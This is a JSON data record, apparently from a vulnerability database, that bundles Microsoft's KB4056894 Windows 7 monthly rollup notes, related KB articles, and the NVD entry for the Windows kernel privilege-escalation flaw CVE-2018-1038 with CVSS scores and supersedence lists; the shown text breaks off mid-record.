{"id": "KB4056894", "bulletinFamily": "microsoft", "title": "January 4, 2018\u2014KB4056894 (Monthly Rollup)", "description": "<html><body><p>Learn more about update KB4056894, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><div><p>This security update includes improvements and fixes that were a part of update\u00a0<a data-content-id=\"4054518\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4054518</a> (released December 12, 2017) and addresses the following issues:</p><ul><li>Security updates to Windows SMB Server, Windows Kernel,\u00a0 Microsoft Graphics Component, Internet Explorer, and Windows Graphics.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see the </span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\"><u>Security Update Guide</u></a></span></span></span><span><span><span><span>.</span></span></span></span></p></div><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td>Microsoft has reports of some customers on a small subset of older AMD processors getting into an unbootable state after installing this KB.<br/>\u00a0<br/>To prevent this issue, Microsoft will temporarily pause Windows OS updates to devices with impacted AMD processors at this time.</td><td><p><span>This issue is resolved in <a data-content-id=\"4073578\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4073578</a>.</span></p></td></tr><tr><td><span>Because of an issue that affects some versions of antivirus software, this fix applies only to computers on which the antivirus ISV updated the ALLOW REGKEY.</span></td><td><p>This issue is resolved in <a data-content-id=\"4093118\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093118</a>. You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</p><p>HKEY_LOCAL_MACHINE\"Subkey=\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc</p><p><span></span></p></td></tr><tr><td><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1:</p><p>\u00a0HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</p></td><td>This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</td></tr></tbody></table><p>\u00a0</p></div><h2>How to get this update</h2><div><p>This update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4056894\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/A/E/4/AE4768D5-D156-43E4-BBAB-82784ED6C758/4056894.csv\" target=\"_blank\">file information for\u00a0update 4056894</a>.</p></div></body></html>", "published": "2018-01-04T00:00:00", "modified": "2018-08-23T01:17:58", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://support.microsoft.com/en-us/help/4056894/", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2018-1038"], "type": "mskb", "lastseen": "2021-01-01T22:52:32", "edition": 16, "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-1038"]}, {"type": "mskb", "idList": ["KB4088875", "KB4088878", "KB4074587", "KB4093118", "KB4074598", "KB4100480", "KB4093108", "KB4056897"]}, {"type": "exploitdb", "idList": ["EDB-ID:44581"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814173", "OPENVAS:1361412562310812848"]}, {"type": "threatpost", "idList": ["THREATPOST:F3ECBE2B14E2562BC2FD58AD4ABA5BC1", "THREATPOST:4A749C6BAE245B913C6360FD1697CE7C"]}, {"type": "thn", "idList": ["THN:7354CA31230FA4D48BE905015B9C3B76"]}, {"type": "kaspersky", "idList": ["KLA11219"]}, {"type": "zdt", "idList": ["1337DAY-ID-30292"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "QUALYSBLOG:825B1704EC215DE72477ABECB37BD7CB"]}, {"type": "cisa", "idList": ["CISA:3D3E239B3E90E3844001DB05F0A3EA02"]}, {"type": "cert", "idList": ["VU:277400"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_MAR_4100480.NASL"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:60F2E118E85CB34AAEEAED9DE88D51AF"]}], "modified": "2021-01-01T22:52:32", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-01-01T22:52:32", "rev": 2}, "vulnersScore": 6.0}, "kb": "KB4056894", "msrc": "", "mscve": "", "msfamily": "", "msplatform": "", "msproducts": [], "supportAreaPaths": ["9087adda-9d1d-0ba1-1b0b-ad434f940308", "417baa75-0c45-df0a-8e65-960580d94f42"], "supportAreaPathNodes": [{"id": "417baa75-0c45-df0a-8e65-960580d94f42", "name": "Windows Server 2008 R2 Service Pack 1", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "9087adda-9d1d-0ba1-1b0b-ad434f940308", "name": "Windows 7 Service Pack 1", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}], "primarySupportAreaPath": [{"id": "f825ca23-c7d1-aab8-4513-64980e1c3007", "name": "Windows 7", "parent": "1267d68d-d9f7-6020-0726-166b153ccbeb", "tree": [], "type": "productname"}, {"id": "1267d68d-d9f7-6020-0726-166b153ccbeb", "name": "Windows", "tree": [], "type": "productfamily"}, {"id": "9087adda-9d1d-0ba1-1b0b-ad434f940308", "name": "Windows 7 Service Pack 1", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}], "superseeds": ["KB3021952", "KB2876315", "KB2699988", "KB3100773", "KB3067505", "KB3153731", "KB3081320", "KB2633171", "KB2829361", "KB931768", "KB948590", "KB3156017", "KB3170377", "KB3101246", "KB3088195", "KB2904266", "KB941672", "KB3139852", "KB2868623", "KB896688", "KB3033395", "KB969805", "KB960225", "KB2977629", "KB3145739", "KB933729", "KB3079757", "KB2918614", "KB931784", "KB2660465", "KB913446", "KB981852", "KB3077657", "KB2868626", "KB908523", "KB3080446", "KB978886", "KB935840", "KB2508429", "KB3045171", "KB2817183", "KB2849470", "KB936021", "KB972260", "KB3177723", "KB2876331", "KB4012215", "KB980182", "KB2961072", "KB929969", "KB3161561", "KB2567053", "KB2850851", "KB3197868", "KB3087039", "KB978251", "KB914389", "KB3170455", "KB955839", "KB896422", "KB2957503", "KB2476687", "KB2544521", "KB2485376", "KB2957509", "KB2744842", "KB951746", "KB3140735", "KB2769369", "KB917953", "KB2790113", "KB2879017", "KB982802", "KB2845690", "KB2497640", "KB921503", "KB4015193", "KB2753842", "KB2707511", "KB923414", "KB2506223", "KB2360131", "KB3167679", "KB3121918", "KB2829530", "KB3153171", "KB2279986", "KB979683", "KB3093983", "KB2718523", "KB960714", "KB2530548", "KB3046306", "KB2562485", "KB2617657", "KB3046049", "KB2624667", "KB833989", "KB3013455", "KB2761451", "KB3139929", "KB2876217", "KB912919", "KB2965155", "KB2511455", "KB2724197", "KB890047", "KB3072595", "KB2658846", "KB2756822", "KB2556532", "KB969897", "KB968537", "KB3062577", "KB910620", "KB930178", "KB942615", "KB980232", "KB3185911", "KB2757638", "KB957097", "KB981550", "KB2923392", "KB956390", "KB3124000", "KB937143", "KB2158563", "KB973037", "KB893086", "KB2416400", "KB3072630", "KB2862973", "KB2855844", "KB2987107", "KB921398", "KB4038777", "KB955069", "KB2870699", "KB982381", "KB971468", "KB2898715", "KB2183461", "KB2799494", "KB3192321", "KB2586448", "KB2893984", "KB3108670", "KB920958", "KB958869", "KB958215", "KB3175024", "KB3023562", "KB3003381", "KB963027", "KB957280", "KB2862772", "KB3140410", "KB3087135", "KB2957189", "KB3097877", "KB3033929", "KB3067904", "KB2503658", "KB4012864", "KB2476490", "KB3175443", "KB2412687", "KB933566", "KB947864", "KB2647516", "KB941644", "KB3164033", "KB981957", "KB2981580", "KB944533", "KB956803", "KB3050514", "KB956841", "KB2847311", "KB3153199", "KB2976627", "KB2507618", "KB4041681", "KB2479628", "KB2792100", "KB2731847", "KB905915", "KB922760", "KB2563894", "KB3207752", "KB883939", "KB3146963", "KB3177725", "KB2778930", "KB3035131", "KB2601626", "KB2797052", "KB2909212", "KB958690", "KB2647170", "KB2758857", "KB2779562", "KB2691442", "KB981793", "KB2709162", "KB3003057", "KB2963952", "KB2655992", "KB978207", "KB2761226", "KB2863058", "KB2393802", "KB4022719", "KB2978668", "KB976098", "KB4015549", "KB956802", "KB4048957", "KB2639417", "KB2688338", "KB3000061", "KB2503665", "KB939653", "KB3161664", "KB2621146", "KB982214", "KB2633952", "KB4054518", "KB978037", "KB2834886", "KB3121212", "KB976325", "KB2555917", "KB951072", "KB938464", "KB3154070", "KB961063", "KB3101746", "KB2859537", "KB2813170", "KB2296199", "KB943460", "KB3069762", "KB2976897", "KB2808735", "KB2964736", "KB3038314", "KB2121546", "KB3148851", "KB2772930", "KB3073921", "KB3124280", "KB928090", "KB2675157", "KB3182203", "KB2507938", "KB896727", "KB3034196", "KB2570791", "KB3124001", "KB3123479", "KB3046482", "KB3049563", "KB3032359", "KB2618444", "KB971486", "KB3079904", "KB917159", "KB974455", "KB938127", "KB3156013", "KB2838727", "KB3203884", "KB3148198", "KB3057839", "KB2922229", "KB3170106", "KB980436", "KB2536275", "KB970238", "KB2567680", "KB3126041", "KB2559049", "KB2809289", "KB980218", "KB3058515", "KB3146706", "KB2939576", "KB3134214", "KB947890", "KB3184471", "KB3069392", "KB950759", "KB925486", "KB970653", "KB969947", "KB954211", "KB3036197", "KB941693", "KB3124275", "KB3002885", "KB2525694", "KB3138962", "KB957095", "KB942763", "KB2799329", "KB935966", "KB3168965", "KB2790655", "KB2719985", "KB2544893", "KB917422", "KB2588516", "KB2930275", "KB977165", "KB2160329", "KB3008923", "KB3164035", "KB3045999", "KB3160352", "KB3177186", "KB3100465", "KB933360", "KB3078071", "KB2592799", "KB953838", "KB3065822", "KB2722913", "KB3126593", "KB943484", "KB3126446", "KB3149090", "KB958687", "KB3162835", "KB2645640", "KB2872339", "KB3184122", "KB943055", "KB3104002", "KB912812", "KB2992611", "KB4025341", "KB3070102", "KB3034344", "KB2585542", "KB3061518", "KB975517", "KB3212646", "KB2676562", "KB924053", "KB918899", "KB2850869", "KB2840149", "KB2482017", "KB2712808", "KB2659262", "KB2207566", "KB3185330", "KB2779030", "KB3160005", "KB979306", "KB2913602", "KB2536276", "KB979559", "KB3072633", "KB4019264", "KB2962872", "KB3032323", "KB2360937", "KB938829", "KB917736", "KB2641653", "KB916281", "KB3185319", "KB3109094", "KB3087038", "KB3039066", "KB3063858", "KB2761465", "KB2883150", "KB2916036", "KB2778344", "KB2839229", "KB935839", "KB4034664", "KB2876284", "KB2926765", "KB3139940", "KB2993958", "KB2286198", "KB2846071", "KB949014", "KB3006226", "KB890923", "KB2079403", "KB2993651", "KB2443685", "KB2436673", "KB2875783", "KB2835361", "KB3134814", "KB2839894"], "parentseeds": ["KB4343900", "KB4516065", "KB4499164", "KB4577051", "KB4338818", "KB4530734", "KB4534310", "KB4571729", "KB4550964", "KB4462923", "KB4103718", "KB4512506", "KB4493472", "KB4565524", "KB4074598", "KB4480970", "KB4471318", "KB4489878", "KB4519976", "KB4580345", "KB4556836", "KB4486563", "KB4586827", "KB4561643", "KB4540688", "KB4284826", "KB4525235", "KB4507449", "KB4592471", "KB4503292", "KB4457144", "KB4093118", "KB4524157", "KB4467107", "KB4088875", "KB4537820"], "msimpact": "", "msseverity": "", "scheme": null}

{"cve": [{"lastseen": "2020-10-03T13:20:08", "description": "The Windows kernel in Windows 7 SP1 and Windows Server 2008 R2 SP1 allows an elevation of privilege vulnerability due to the way it handles objects in memory, aka \"Windows Kernel Elevation of Privilege Vulnerability.\"", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-02T13:29:00", "title": "CVE-2018-1038", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1038"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2018-1038", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1038", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}], "mskb": [{"lastseen": "2021-01-01T22:44:19", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Describes a Windows kernel update for CVE-2018-1038</p><h2>Notice</h2><p>This update has been superceded by the following newer updates:</p><div class=\"indent\"><a href=\"https://support.microsoft.com/help/4093108\">April 10, 2018\u2014KB4093108 (Security-only update)</a><br/><a href=\"https://support.microsoft.com/help/4093118\">April 10, 2018\u2014KB4093118 (Monthly Rollup)</a></div><h2>Summary</h2><p>This update addresses an elevation of privilege vulnerability in the Windows kernel in the 64-Bit (x64) version of Windows.\u00a0This\u00a0vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>. Users must apply this update to be fully protected against this vulnerability if their computers were updated\u00a0on or after January 2018 by applying\u00a0any of the following updates.</p><table class=\"table\"><tbody><tr><td width=\"94\"><p><strong><span>KB article</span></strong></p></td><td width=\"569\"><p><strong><span>Title</span></strong></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4056897/windows-7-update-kb4056897\"><span>4056897</span></a></p></td><td width=\"569\"><p><span>January 3, 2018\u2014KB4056897 (Security-only update)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4056894/windows-7-update-kb4056894\"><span>4056894</span></a></p></td><td width=\"569\"><p><span>January 4, 2018\u2014KB4056894 (Monthly Rollup)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4073578/unbootable-state-for-amd-devices-in-windows-7-sp1-windows-server-2008\"><span>4073578</span></a></p></td><td width=\"569\"><p><span>Unbootable state for AMD devices in Windows 7 SP1 and Windows Server 2008 R2 SP1</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4057400/windows-7-update-kb4057400\"><span>4057400</span></a></p></td><td width=\"569\"><p><span>January 19, 2018\u2014KB4057400 (Preview of Monthly Rollup)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4074598/windows-7-update-kb4074598\"><span>4074598</span></a></p></td><td width=\"569\"><p><span>February 13, 2018\u2014KB4074598 (Monthly Rollup)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4074587/windows-7-update-kb4074587\"><span>4074587</span></a></p></td><td width=\"569\"><p><span>February 13, 2018\u2014KB4074587 (Security-only update)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4075211/windows-7-update-kb4075211\"><span>4075211</span></a></p></td><td width=\"569\"><p><span>February 22, 2018\u2014KB4075211 (Preview of Monthly Rollup)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4088875/windows-7-update-kb4088875\"><span>4088875</span></a></p></td><td width=\"569\"><p><span>March 13, 2018\u2014KB4088875 (Monthly Rollup)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4088878/windows-7-update-kb4088878\"><span>4088878</span></a></p></td><td width=\"569\"><p><span>March 13, 2018\u2014KB4088878 (Security-only update)</span></p></td></tr><tr><td width=\"94\"><p><a href=\"https://support.microsoft.com/en-us/help/4088881/windows-7-update-kb4088881\"><span>4088881</span></a></p></td><td width=\"569\"><p><span>March 23, 2018\u2014KB4088881 (Preview of Monthly Rollup)</span></p></td></tr></tbody></table><p>\u00a0</p><h2>Notes</h2><ul><li>This security update was updated on April 5, 2018 to address applicability issues in the original release of the update.</li><li>Applicability rules have been expanded for this update. Therefore, this update will be offered via Windows Update and Windows Server Update Service (WSUS) if any of the Security Only (SO) updates that are listed in the table above are applied.</li><li><span lang=\"EN-US\"><span>No specific functional changes have been made to this security update. Therefore, no additional action is needed if this update has already been applied.</span></span></li></ul><h2>Known issues</h2><p class=\"paragraph\"><span><span><span>Microsoft is not aware of any issues that affect this update currently.\u202f</span></span></span></p><h2>How to get this update</h2><div class=\"Ltr OutlineElement SCXW128312254\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Method 1: Windows Update</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><div class=\"Ltr OutlineElement SCXW169651968\"><p aria-level=\"3\" class=\"Paragraph SCXW169651968\" paraeid=\"{29912da6-6187-4172-a4e4-dc59cd717b1e}{207}\" paraid=\"1691347728\" role=\"heading\"><span class=\"SCXW169651968 TextRun\" lang=\"EN-US\" xml:lang=\"EN-US\"><span class=\"NormalTextRun SCXW169651968\">This update can be downloaded and installed from Windows Update.</span></span></p></div></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span>Method 2:</span><span> Windows Server Update Service </span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p><span><span><span><span>This update is now available for installation through WSUS.</span></span></span></span><span><span> </span></span></p></div></div></div><div class=\"faq-section\" faq-section=\"\"><div aria-label=\"Collapsible widget\" contenteditable=\"false\" role=\"region\" tabindex=\"-1\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Method 3:\u00a0<span class=\"NormalTextRun SCXW128312254\"><strong>Microsoft Update Catalog</strong></span><span class=\"EOP SCXW128312254\" data-ccp-props='{\"201341983\":2,\"335559738\":40,\"335559739\":0,\"335559740\":420}'>\u00a0</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p><span class=\"SCXW128312254 TextRun\" lang=\"EN-US\" xml:lang=\"EN-US\"><span class=\"NormalTextRun SCXW128312254\">To get the stand-alone package for this update, go to the </span></span><a class=\"Hyperlink SCXW128312254\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4100480\" rel=\"noreferrer\" target=\"_blank\">Microsoft Update Catalog</a><span class=\"SCXW128312254 TextRun\" lang=\"EN-US\" xml:lang=\"EN-US\"><span class=\"NormalTextRun SCXW128312254\"> website.</span></span><span class=\"EOP SCXW128312254\" data-ccp-props='{\"134233117\":true,\"134233118\":true,\"201341983\":2,\"335559739\":360,\"335559740\":297}'>\u00a0</span></p></div></div></div></div></div><h2>References</h2><p><span>Learn about the</span><a href=\"https://support.microsoft.com/en-us/kb/824684\" target=\"_blank\"><span> terminology</span></a><span> that Microsoft uses to describe software updates.</span></p></body></html>", "edition": 2, "modified": "2018-04-13T15:02:08", "id": "KB4100480", "href": "https://support.microsoft.com/en-us/help/4100480/", "published": "2018-04-13T15:02:08", "title": "Windows kernel update for CVE-2018-1038", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:46:30", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4056897, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. No new operating system features are\u00a0introduced in this update. Key changes include the following:</p><ul><li>Security updates to Microsoft Graphics Component, Windows Graphics, Windows Kernel, and Windows SMB Server.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see\u00a0the </span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\"><u>Security Update Guide</u></a></span></span></span><span><span><span><span>.</span></span></span></span></p></div><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><table class=\"table\"><tbody><tr><td class=\"x-hidden-focus\"><p>Symptom</p></td><td>Workaround</td></tr><tr><td class=\"x-hidden-focus\"><p>Microsoft has reports of some customers on a small subset of older AMD processors getting into an unbootable state after installing this KB.<br/>\u00a0<br/>To prevent this issue, Microsoft will temporarily pause Windows OS updates to devices with impacted AMD processors at this time.</p></td><td><p><span>This issue is resolved in <a data-content-id=\"4073578\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4073578</a>.</span></p></td></tr><tr><td class=\"x-hidden-focus\"><span>Because of an issue that affects some versions of antivirus software, this fix applies only to computers on which the antivirus ISV updated the ALLOW REGKEY.</span></td><td><p><span><span><span>This\u00a0issue is resolved in <a data-content-id=\"4093108\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093108</a>.\u00a0</span></span></span><span><span><span>You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</span></span></span></p><p><span><span><span><span><span>HKEY_LOCAL_MACHINE\"Subkey=\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\</span></span><span><span>cadca5fe-87d3-4b96-b7fb-a231484277cc</span></span></span></span></span></p></td></tr><tr><td class=\"x-hidden-focus\"><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1:</p><p>\u00a0HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</p></td><td><p>This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</p></td></tr></tbody></table><h2>How to get this update</h2><div><p>This update is now available for installation through WSUS. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4056897\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/3/8/C/38CAB8B3-AFE5-41C4-B85E-C909CE59061A/4056897.csv\" target=\"_blank\">file information for\u00a0update 4056897</a>.</p></div></body></html>", "edition": 2, "modified": "2018-08-23T01:03:11", "id": "KB4056897", "href": "https://support.microsoft.com/en-us/help/4056897/", "published": "2018-01-03T00:00:00", "title": "January 3, 2018\u2014KB4056897 (Security-only update)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:34:59", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4093108, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:</p><ul><li><p><span><span><span><span>Windows Update and WSUS will offer this update to applicable Windows client and server operating systems, regardless of the existence or value of the \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\</span></span></span><span><span><span><span>cadca5fe-87d3-4b96-b7fb-a231484277cc</span></span></span></span><span><span><span>\" registry setting. </span></span></span><span><span><span><span>This change has been made to protect user data.</span></span></span></span> </span></p></li><li><p>Improves reliability in the kernel, and addresses an issue that can cause applications to have unexpected memory contents on multi-processor systems.</p></li><li><p>Addresses a stop error that occurred when the previous month\u2019s update was applied to a 32-bit (x86) computer with a Physical Address Extension (PAE) mode disabled.</p></li><li>Security updates to Internet Explorer, Microsoft scripting engine, Microsoft graphics component, Windows Server, Windows datacenter networking, Windows virtualization and kernel, and Windows app platform and frameworks.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see the </span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\"><u>Security Update Guide</u></a></span></span></span><span><span><span><span>.</span></span></span></span></p><p><strong>Note: </strong>This update supercedes update\u00a0<a href=\"https://support.microsoft.com/help/4100480/\">4100480</a>,\u00a0Windows kernel update for CVE-2018-1038.</p></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td valign=\"top\"><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1: \u00a0</p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</td></tr><tr><td valign=\"top\">A stop error occurs on computers that don't support Streaming Single Instructions Multiple Data (SIMD) Extensions 2 (SSE2).</td><td valign=\"top\">Upgrade your machines with a processor that supports SSE2 or virtualize those machines.</td></tr></tbody></table></div><h2>How to get this update</h2><div><p><span>This update is now available for installation through WSUS</span>. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4093108\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/7/A/4/7A4CFA42-F311-4FDB-B2A1-B7664CFEA96F/4093108.csv\" target=\"\">file information for update 4093108</a>.</p></div></body></html>", "edition": 2, "modified": "2018-06-15T23:33:19", "id": "KB4093108", "href": "https://support.microsoft.com/en-us/help/4093108/", "published": "2018-04-10T00:00:00", "title": "April 10, 2018\u2014KB4093108 (Security-only update)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:46:04", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4074587, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:</p><ul><li>Security updates to Windows Graphics, Windows Kernel, Common Log File System driver, Microsoft Windows Search component, and Windows storage and file systems.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see the </span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\"><u>Security Update Guide</u></a></span></span></span><span><span><span><span>.</span></span></span></span></p></div><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td>Because of an issue that affects some versions of antivirus software, this fix 